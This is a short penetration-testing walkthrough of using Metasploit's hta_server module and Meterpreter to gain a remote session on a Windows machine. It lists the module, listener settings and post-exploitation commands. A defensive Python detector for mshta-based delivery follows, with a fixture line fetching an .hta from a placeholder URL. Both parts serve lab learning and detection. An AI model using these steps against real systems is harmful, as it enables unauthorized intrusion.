METASPLOIT


Overview:

Metasploit is an open source penetration testing tool. It has a database of public exploits and vulnerabilities. It can execute remote attacks after gaining root access.

Here I will show how to use Metasploit and Meterpreter to gain access to a Windows machine.

Steps:

To open Metasploit, the command is “msfconsole”

Checking the IP of the Windows machine

Now to attack the Windows machine.

  • One of the known vulnerabilities of Windows is the HTA server. An HTA is an HTML application, but with the right payload it can be used to open a backdoor to a system

Accessing the module by using the command “use exploit/windows/misc/hta_server”

Checking options to set:

Checking the IP of the attacker's machine

Setting LHOST, SRVHOST and LPORT according to the attacker's machine

Launching the payload

When the URL is opened in a browser, it automatically downloads a file

Opening and running the file

Now here we can see it is delivering the payload

The screenshot shows the amount of data that has been sent

Now using the command “sessions -i” to check where the session has been sent

The “sysinfo” command shows the name of the machine, OS, architecture, etc.

The “help” command shows the commands available to us on the system

All the commands that we can run in a normal Windows cmd, we can run here now

Now confirming the IP:
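For defenders, the step where the downloaded file is opened and run leaves a process-creation trail, because Windows runs .hta files with mshta.exe. The following is an added example, not part of the original post: it flags that trail in constructed Sysmon-style process-creation events. The event values, the browser list and the rule wording are assumptions made for illustration.

```python
import re

# Constructed sample events using Sysmon Event ID 1 field names; every value is made up.
SYS32 = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = [
    {"Image": SYS32 + "mshta.exe", "ParentImage": "C:\\Program Files\\Browser\\chrome.exe",
     "CommandLine": 'mshta.exe "C:\\Users\\alice\\Downloads\\update.hta"'},
    {"Image": SYS32 + "mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "mshta.exe http://192.0.2.10:8080/placeholder.hta"},
    {"Image": SYS32 + "cmd.exe", "ParentImage": SYS32 + "mshta.exe",
     "CommandLine": "cmd.exe /c echo test"},
    {"Image": SYS32 + "mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": 'mshta.exe "C:\\Program Files\\Vendor\\console.hta"'},
    {"Image": SYS32 + "notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}  # assumed list
USER_WRITABLE_HTA = re.compile(r'\\(downloads|temp|inetcache)\\[^"]*\.hta', re.I)
REMOTE_URL = re.compile(r"https?://", re.I)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the reasons an event looks like HTA-based delivery (empty list = no match)."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd, reasons = event["CommandLine"], []
    if image == "mshta.exe":
        if parent in BROWSERS:
            reasons.append("mshta launched by browser")
        if REMOTE_URL.search(cmd):
            reasons.append("mshta given remote URL")
        if USER_WRITABLE_HTA.search(cmd):
            reasons.append("hta run from download or temp path")
    elif parent == "mshta.exe":
        reasons.append("mshta spawned child process")
    return reasons

def scan(events):
    """Return (index, reasons) for every event that matched at least one rule."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(idx, "; ".join(reasons))
```

The fourth sample event, a vendor .hta started from Program Files by explorer.exe, is left unflagged, which shows why the rules key on the launch context rather than on mshta.exe alone.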
